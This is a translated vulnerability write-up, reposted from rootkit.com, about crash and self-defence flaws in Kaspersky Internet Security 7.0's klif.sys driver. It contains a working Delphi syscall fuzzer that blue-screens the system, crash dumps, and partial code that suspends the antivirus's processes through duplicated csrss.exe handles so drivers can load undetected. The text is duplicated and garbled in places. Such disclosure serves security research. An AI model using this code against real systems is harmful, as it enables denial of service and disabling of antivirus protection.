Kaspersky's back doors 6/7
Translation of an article from the rootkit.com website
Preamble
Kaspersky Anti-Virus is one of the most technically advanced antiviruses today. It can even fight with some types of rootkits , even when they are alive and trying to attack.
It has a Proactive Defense Module, which is a partial implementation of HIPS , which, in theory, can protect a computer from unknown threats by analyzing program behavior and preventing unauthorized actions.
')
This is all theory and advertising slogans. In reality, we have a completely different situation. There are many rootkits that are not detected by the antivirus at all, and its proactive protection can be suppressed in such a way that the attacker can load his driver, after which any proactive protection is simply useless.
This article is not just a review of errors and vulnerabilities - at the end of each part, we give recommendations to antivirus developers, because we see that they cannot solve these errors on their own. And for adherents right away, of course, everything that is written below is not critical vulnerabilities, no, no =) Just a few simple methods to get a BSOD with the KAV / KIS installed, even from under a guest account, just KAV / KIS bypass methods ... so on, in general, do not take too close to your heart.
The version of Kaspersky, which will be discussed in this article - 7.0, the last public build 125, the type of product - Internet Security.
Kaspersky and System Service Descriptor Table
This part of the antivirus has long been known as the most vulnerable. That it is due to the fact that it contains a lot of elementary errors. These errors are another example of poorly written proactive defense.
Under Windows XP, Kaspersky Anti-Virus adds services to the SSDT table. Many services that exist only under Windows 2003. Their numbers range from 284 to 296. About 13 unknown entries with addresses inside klif.sys.
Here they are:
What is it? Completely incomprehensible. However, it seems that the KAV developers add them to solve the problem with a different number of entries in the SSDT table under Windows XP and 2003. Why it was done that way - the third question.
And now attention: any of these records can be hacked with the subsequent collapse of the system in the BSOD, even from under a guest account with minimal privileges . We wrote a small program. It generates invalid system calls with incorrect parameters for these mysterious entries in the SSDT. The code is very simple, but effective. Running it on pure Windows will not lead to anything, because Windows itself handles such situations correctly.
Result of performance: Kaspersky Internet Security v7.0 125 build
But that's not all!
Despite reports of existing vulnerabilities in SSDT, Kaspersky developers have not yet fixed them!
We can prove it with a simple program called NTCALL. After the start, it starts generating incorrect system calls.
NtCreateSection - calling this function with incorrect parameters will result in a BSOD in klif.sys.
Here it is our BSOD:
What can I say? .. It's time to stop perverting with SSDT and write normal handlers for SSDT entries. Take better and ask Oleg Zaitsev how to install hooks in SSDT correctly;)
Kaspersky and Shadow SSDT (Shadow SSDT)
Shadow SSDT is a special table in win32k.sys, which contains addresses of system functions related to the display of the user graphic interface (GDI). Kaspersky installs hooks on some services here to prevent keyloggers from working and for self-defense.
And again, badly installed hooks.
NtUserSendInput with wrong parameters and ... -> haha, the new BSOD, doesn't this remind you of some kind of BSOD generator? =)
The recommendations for this part are simple - run your driver under the debugger.
Following code
leads to Acces Violation and this is normal, because we used an incorrect parameter for the function, but what is NOT normal is where Acess Violation occurs, at the address - 0xF80B3306.
This is not a joke - 0xF80B3306. In kernel processes! And to be more precise - in klif.sys.
Let's see what happens.
We found a strong IAT modification ( 1 , 2 ) for each process in the system. See what happens with explorer.exe
Strange isn't it? Let's trace the call to LoadLibraryA.
This is what LoadLibraryA looks like inside kernel32.dll after IAT redirection by Kaspersky Anti-Virus. Is this not a perversion?
If you install this anti-virus on your computer, you (ironically!) Open it for additional vulnerabilities and backdoors created by Kaspersky Anti-Virus! Laughter, and only.
In this part, we recommend that Kaspersky developers remove the perversions from their product. First, there are better and simpler ways to communicate with kernel processes, and secondly, it’s just a perversion.
Kaspersky Anti-Virus and Self-Defense
As most of you know, Kaspersky Anti-Virus actively protects itself against attacks. Its processes are protected from unauthorized access and from destruction by malicious programs. But the question is: how well are they protected?
Answer: BAD.
Kaspersky installs several hooks in the SSDT (i.e. NtOpenProcess, NtOpenThread, NtTerminateProcess, etc.) and several hooks in the Shadow SSDT (NtUserFindWindowEx, NtUserBuildHwndList, etc.) to further protect themselves from attacks.
In the end, it installs itself as a service with restart settings when an error occurs. Service settings are protected in the registry with several hooks in the SSDT. So how can we kill this antivirus? And do we need to kill him? If we kill the avp.exe visual part, it will be restarted by the service. If we kill a service, it will be launched by the Service Control Manager (SCM). So how can we destroy this antivirus (for educational purposes, of course)? Good question.
The answer is simple - load the driver, after that we will be out of KAV's area of ​​interest. But first we need to suspend it in order to get this opportunity, right? Not really. There are at least three methods by which you can silently load a driver without the slightest reaction from Kaspersky Proactive Defense 7.0. And I am sure that there are more methods. In our case, we simply suspend all threads of the processes of Kaspersky Anti-Virus; just pause, nothing more - that's enough.
We cannot directly access Kaspersky processes, because the owner of the SSDT is PDM . So it's time to use the “favorite” backdoor process called csrss.exe :)
In this example, we assume a priori that the KAV application is named avp.exe and csrss.exe exists in the same instance (LOL, yes, if you have malware running on ring3 and disguised as csrss.exe, then this code will have certain problems ).
After that, both Kaspersky executable modules will be suspended and we can load the drivers and do our work quietly =)
Tested on KIS v7.0 build 125 with default settings.
Windws XP SP2, admin rights.
We recommend that the LC go to HANDLE_TABLE and change the access rights for the handlers of their processes. Plus it's time to improve the hook on NtDuplicateObject.
Epilogue
You are probably asking yourself now why such obvious mistakes - do backdoors still exist in one of the most popular antiviruses? Yes, because someone has to give a good ass of Kaspersky Lab.
Not so long ago, we published another review of KAV errors. The reaction was expected. They said something like "Do not worry, these are not critical errors." Well, yes, maybe the Blue screen of death from under the Guest account is not such a big problem for the company. "Really. Che for BSOD in general? Garbage, guys, relax ”:) But something is changing - they have closed several published vulnerabilities, so we should have said a small thank you to us. Instead, we get a bunch of $ @% $ & #! in his address (unofficially, of course). Well, we just do not worry about this reaction, so do not bother the guys (fanatics?). We do not want self-promotion and do not want to watch stupid BSOD-s from Kaspersky.
Dear Kaspersky Lab developers, your antivirus is very good, there is no dispute about this, but perhaps the time has come to fix these bugs? Remove perversions with SSDT / IAT. Carefully handle critical situations in your driver. No seriously, what's wrong? Looking at klif.sys, I see only one thing - a big, buggy driver.
By the way, in some way, an unofficial reaction from Kaspersky Lab to our previous review of klif.sys can be found in this wonderful article, which contains several absurd statements and comments that are not meaningful. In a few words: the author of this article partially accused us of publishing information about vulnerabilities in their old and new products.
www.viruslist.ru/analysis?pubid=204007553
The article is in Russian, but I am sure you can find the English version.
Have fun,
by VX heavens
EP_X0FF / UG North
rootkit.com
smartov: Quote from the article about which they speak at the end
As it was in KVN: "Excellent plan!". Such biaki publish vulnerabilities, and because of this, poor-unhappy antivirus vendors have to break away fromcabbage cutting the development of a new, improved user interface and fix them.
ps At the very most installed KAV 7.0.0.125 ...
Preamble
Kaspersky Anti-Virus is one of the most technically advanced antiviruses today. It can even fight with some types of rootkits , even when they are alive and trying to attack.
It has a Proactive Defense Module, which is a partial implementation of HIPS , which, in theory, can protect a computer from unknown threats by analyzing program behavior and preventing unauthorized actions.
')
This is all theory and advertising slogans. In reality, we have a completely different situation. There are many rootkits that are not detected by the antivirus at all, and its proactive protection can be suppressed in such a way that the attacker can load his driver, after which any proactive protection is simply useless.
This article is not just a review of errors and vulnerabilities - at the end of each part, we give recommendations to antivirus developers, because we see that they cannot solve these errors on their own. And for adherents right away, of course, everything that is written below is not critical vulnerabilities, no, no =) Just a few simple methods to get a BSOD with the KAV / KIS installed, even from under a guest account, just KAV / KIS bypass methods ... so on, in general, do not take too close to your heart.
The version of Kaspersky, which will be discussed in this article - 7.0, the last public build 125, the type of product - Internet Security.
Kaspersky and System Service Descriptor Table
This part of the antivirus has long been known as the most vulnerable. That it is due to the fact that it contains a lot of elementary errors. These errors are another example of poorly written proactive defense.
Under Windows XP, Kaspersky Anti-Virus adds services to the SSDT table. Many services that exist only under Windows 2003. Their numbers range from 284 to 296. About 13 unknown entries with addresses inside klif.sys.
Here they are:
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, 0xF809BD80 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys]
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, 0xF809BD90 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys]
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, 0xF809BDA0 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys]
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, 0xF809BDC0 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys]
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, 0xF809BDE0 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys]
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, 0xF809BE10 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys]
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, 0xF809BE20 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys]
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, 0xF809BE40 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys]
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, 0xF809BE50 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys]
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, 0xF809BF10 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys]
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, 0xF809BFE0 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys]
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, 0xF809C020 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys]
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, 0xF809C060 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys]
What is it? Completely incomprehensible. However, it seems that the KAV developers add them to solve the problem with a different number of entries in the SSDT table under Windows XP and 2003. Why it was done that way - the third question.
And now attention: any of these records can be hacked with the subsequent collapse of the system in the BSOD, even from under a guest account with minimal privileges . We wrote a small program. It generates invalid system calls with incorrect parameters for these mysterious entries in the SSDT. The code is very simple, but effective. Running it on pure Windows will not lead to anything, because Windows itself handles such situations correctly.
var
Services: array[0..12] of ULONG;
ThreadTerminated: boolean = false;
ExecThread: THANDLE;
function MakeSysCall(SysCallNumber: integer; const Stack: PDWORD): DWORD; stdcall;
asm
mov eax, SysCallNumber
mov edx, Stack
int 2eh
mov Result,eax
end;
function exec(p1: pointer): DWORD; stdcall;
var
i: integer;
p2: DWORD;
p3: DWORD;
begin
randomize();
u := 0;
for i := 0 to 12 do Services[i] := 284 + i;
while not ThreadTerminated do
begin
p2 := random($FFFFFFFF);
p3 := Services[random(12)];
MakeSysCall(p3, @p2);
Sleep(100);
end;
CloseHandle(ExecThread);
ExecThread := 0;
result := 0;
end;
var
p2: DWORD;
begin
ThreadTerminated := false;
ExecThread := CreateThread(nil, 0, @exec, nil, 0, p2);
end;
Result of performance: Kaspersky Internet Security v7.0 125 build
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: e0ae15f9, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: f8087e8c, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
all bsod text ...
But that's not all!
Despite reports of existing vulnerabilities in SSDT, Kaspersky developers have not yet fixed them!
We can prove it with a simple program called NTCALL. After the start, it starts generating incorrect system calls.
NtCreateSection - calling this function with incorrect parameters will result in a BSOD in klif.sys.
Here it is our BSOD:
KERNEL_MODE_EXCEPTION_NOT_HANDLED_M (1000008e)
This is a very common bugcheck. Usually the exception address pinpoints
the driver / function is what caused the problem. Always note this address
This contains the address.
Some common problems are exception code 0x80000003. This means a hard
coded breakpoint or assertion
/ NODEBUG. This is not supposed to happen.
hardcoded breakpoints in retail code, but ...
If this happens, make sure a debugger gets connected, and the
system is booted / DEBUG. This will let us see why this breakpoint is
happening.
Arguments:
Arg1: c0000005, The exception code that was not handled
Arg2: 805883ea, The address that
Arg3: f669a95c, Trap Frame
Arg4: 00000000
Debugging Details:
- ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload / f ntoskrnl.exe = FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix the symbols to do analysis.
MODULE_NAME: klif
all bsod text ...
What can I say? .. It's time to stop perverting with SSDT and write normal handlers for SSDT entries. Take better and ask Oleg Zaitsev how to install hooks in SSDT correctly;)
Kaspersky and Shadow SSDT (Shadow SSDT)
Shadow SSDT is a special table in win32k.sys, which contains addresses of system functions related to the display of the user graphic interface (GDI). Kaspersky installs hooks on some services here to prevent keyloggers from working and for self-defense.
And again, badly installed hooks.
NtUserSendInput with wrong parameters and ... -> haha, the new BSOD, doesn't this remind you of some kind of BSOD generator? =)
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: e1f83004, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: f9417eee, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000001, (reserved)
Debugging Details:
- ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload / f ntoskrnl.exe = FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix the symbols to do analysis.
MODULE_NAME: klif
all bsod text ...
The recommendations for this part are simple - run your driver under the debugger.
Following code
var
p1: PChar;
begin
p1: = PChar ($ ffffffff);
LoadLibraryA (p1);
end;
leads to Acces Violation and this is normal, because we used an incorrect parameter for the function, but what is NOT normal is where Acess Violation occurs, at the address - 0xF80B3306.
This is not a joke - 0xF80B3306. In kernel processes! And to be more precise - in klif.sys.
Let's see what happens.
We found a strong IAT modification ( 1 , 2 ) for each process in the system. See what happens with explorer.exe
[420] explorer.exe -> kernel32.dll -> LoadLibraryExA, Type: IAT Modification at address 0x010010A8 -> 7C882FB0 hook handler located in [kernel32.dll]
[420] explorer.exe -> kernel32.dll -> LoadLibraryExW, Type: IAT Modification at address 0x010010F8 -> 7C882FD8 hook handler located in [kernel32.dll]
[420] explorer.exe -> kernel32.dll -> LoadLibraryA, Type: IAT Modification at address 0x01001150 -> 7C882F9C hook handler located in [kernel32.dll]
[420] explorer.exe -> kernel32.dll -> LoadLibraryW, Type: IAT Modification at address 0x010011D0 -> 7C882FC4 hook handler located in [kernel32.dll]
[420] explorer.exe -> kernel32.dll -> GetProcAddress Type: IAT Modification at address 0x010011E4 -> 7C882FEC hook handler located in [kernel32.dll]
Strange isn't it? Let's trace the call to LoadLibraryA.
KERNEL32.LoadLibraryA:
push ebp
mov ebp, esp
nop
pop ebp
jmp + $ 7b830b4a // - redirect to klif.sys
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
This is what LoadLibraryA looks like inside kernel32.dll after IAT redirection by Kaspersky Anti-Virus. Is this not a perversion?
If you install this anti-virus on your computer, you (ironically!) Open it for additional vulnerabilities and backdoors created by Kaspersky Anti-Virus! Laughter, and only.
In this part, we recommend that Kaspersky developers remove the perversions from their product. First, there are better and simpler ways to communicate with kernel processes, and secondly, it’s just a perversion.
Kaspersky Anti-Virus and Self-Defense
As most of you know, Kaspersky Anti-Virus actively protects itself against attacks. Its processes are protected from unauthorized access and from destruction by malicious programs. But the question is: how well are they protected?
Answer: BAD.
Kaspersky installs several hooks in the SSDT (i.e. NtOpenProcess, NtOpenThread, NtTerminateProcess, etc.) and several hooks in the Shadow SSDT (NtUserFindWindowEx, NtUserBuildHwndList, etc.) to further protect themselves from attacks.
In the end, it installs itself as a service with restart settings when an error occurs. Service settings are protected in the registry with several hooks in the SSDT. So how can we kill this antivirus? And do we need to kill him? If we kill the avp.exe visual part, it will be restarted by the service. If we kill a service, it will be launched by the Service Control Manager (SCM). So how can we destroy this antivirus (for educational purposes, of course)? Good question.
The answer is simple - load the driver, after that we will be out of KAV's area of ​​interest. But first we need to suspend it in order to get this opportunity, right? Not really. There are at least three methods by which you can silently load a driver without the slightest reaction from Kaspersky Proactive Defense 7.0. And I am sure that there are more methods. In our case, we simply suspend all threads of the processes of Kaspersky Anti-Virus; just pause, nothing more - that's enough.
We cannot directly access Kaspersky processes, because the owner of the SSDT is PDM . So it's time to use the “favorite” backdoor process called csrss.exe :)
In this example, we assume a priori that the KAV application is named avp.exe and csrss.exe exists in the same instance (LOL, yes, if you have malware running on ring3 and disguised as csrss.exe, then this code will have certain problems ).
...
pBuffer.dwSize: = sizeof (PROCESSENTRY32W);
SnapShotHandle: = CreateToolHelp32SnapShot (TH32CS_SNAPPROCESS, 0);
...
if (ZwOpenProcess (@ph, PROCESS_ALL_ACCESS, @attr, @ cid1) <> STATUS_SUCCESS) then exit;
...
ZwAllocateVirtualMemory (GetCurrentProcess (), buf , 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE);
ZwQuerySystemInformation (SystemHandleInformation, buf, 4194304, @bytesIO);
the whole text of the program ...
After that, both Kaspersky executable modules will be suspended and we can load the drivers and do our work quietly =)
Tested on KIS v7.0 build 125 with default settings.
Windws XP SP2, admin rights.
We recommend that the LC go to HANDLE_TABLE and change the access rights for the handlers of their processes. Plus it's time to improve the hook on NtDuplicateObject.
Epilogue
You are probably asking yourself now why such obvious mistakes - do backdoors still exist in one of the most popular antiviruses? Yes, because someone has to give a good ass of Kaspersky Lab.
Not so long ago, we published another review of KAV errors. The reaction was expected. They said something like "Do not worry, these are not critical errors." Well, yes, maybe the Blue screen of death from under the Guest account is not such a big problem for the company. "Really. Che for BSOD in general? Garbage, guys, relax ”:) But something is changing - they have closed several published vulnerabilities, so we should have said a small thank you to us. Instead, we get a bunch of $ @% $ & #! in his address (unofficially, of course). Well, we just do not worry about this reaction, so do not bother the guys (fanatics?). We do not want self-promotion and do not want to watch stupid BSOD-s from Kaspersky.
Dear Kaspersky Lab developers, your antivirus is very good, there is no dispute about this, but perhaps the time has come to fix these bugs? Remove perversions with SSDT / IAT. Carefully handle critical situations in your driver. No seriously, what's wrong? Looking at klif.sys, I see only one thing - a big, buggy driver.
By the way, in some way, an unofficial reaction from Kaspersky Lab to our previous review of klif.sys can be found in this wonderful article, which contains several absurd statements and comments that are not meaningful. In a few words: the author of this article partially accused us of publishing information about vulnerabilities in their old and new products.
www.viruslist.ru/analysis?pubid=204007553
The article is in Russian, but I am sure you can find the English version.
Have fun,
by VX heavens
EP_X0FF / UG North
rootkit.com
smartov: Quote from the article about which they speak at the end
In recent years, the following situation is extremely relevant. Someone from among the cybercriminals (or “researchers” hiding behind white hats) is developing a concept code that bypasses modern means of protection, and in order to self-advertise, disguised as a concern for progress, publishes it as “undetectable”. We emphasize: of course, in fact such a concept is not fundamentally undetectable, but undetectable at the level of a one-two-step detour of the known functions of protective equipment. It is quite simple to make such a one-step walk around if the protection mechanisms are known.
Such publications worry a certain percentage of users who are not familiar with the principles of malware and antivirus (“Does my anti-virus tool protect against this new type of threat?). In such a situation, manufacturers of remedies need only throw a share of resources to restore their authority: to develop technologies to circumvent the described concept, usually the same as the concept itself - one-step. As a result, the authority is restored (and how else?), The system “malicious program - antivirus - user” comes to its original state, and the process closes into a cycle. Each of its new iterations generates increasingly sophisticated malware and increasingly heavy security tools.
As it was in KVN: "Excellent plan!". Such biaki publish vulnerabilities, and because of this, poor-unhappy antivirus vendors have to break away from
ps At the very most installed KAV 7.0.0.125 ...
Source: https://habr.com/ru/post/16037/
All Articles